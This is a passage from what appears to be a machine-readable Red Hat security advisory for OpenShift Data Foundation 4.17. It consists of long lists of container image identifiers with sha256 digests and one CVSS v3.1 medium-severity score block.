"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", 